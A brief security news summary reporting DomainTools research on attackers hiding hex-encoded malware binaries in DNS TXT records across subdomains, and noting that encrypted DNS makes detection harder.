Hackers are exploiting domain name system (DNS) records to hide malware, enabling malicious scripts to fetch binaries undetected by antivirus tools. DNS traffic often escapes scrutiny compared to web and email traffic. Recent research revealed the use of TXT records to store chunks of malicious files. Each binary is encoded in hexadecimal and dispersed among multiple subdomains, allowing attackers to reconstruct the malware via innocuous DNS requests. As encrypted DNS protocols like DOH and DOT become more common, detection and monitoring will become increasingly challenging for security defenses.
Researchers from DomainTools recently identified a method where attackers use DNS records to hide malicious binaries, making them difficult for security tools to detect.
Malicious scripts can exploit DNS lookups to fetch binaries without triggering antivirus software, largely remaining unmonitored compared to web and email traffic.
Collection
[
|
...
]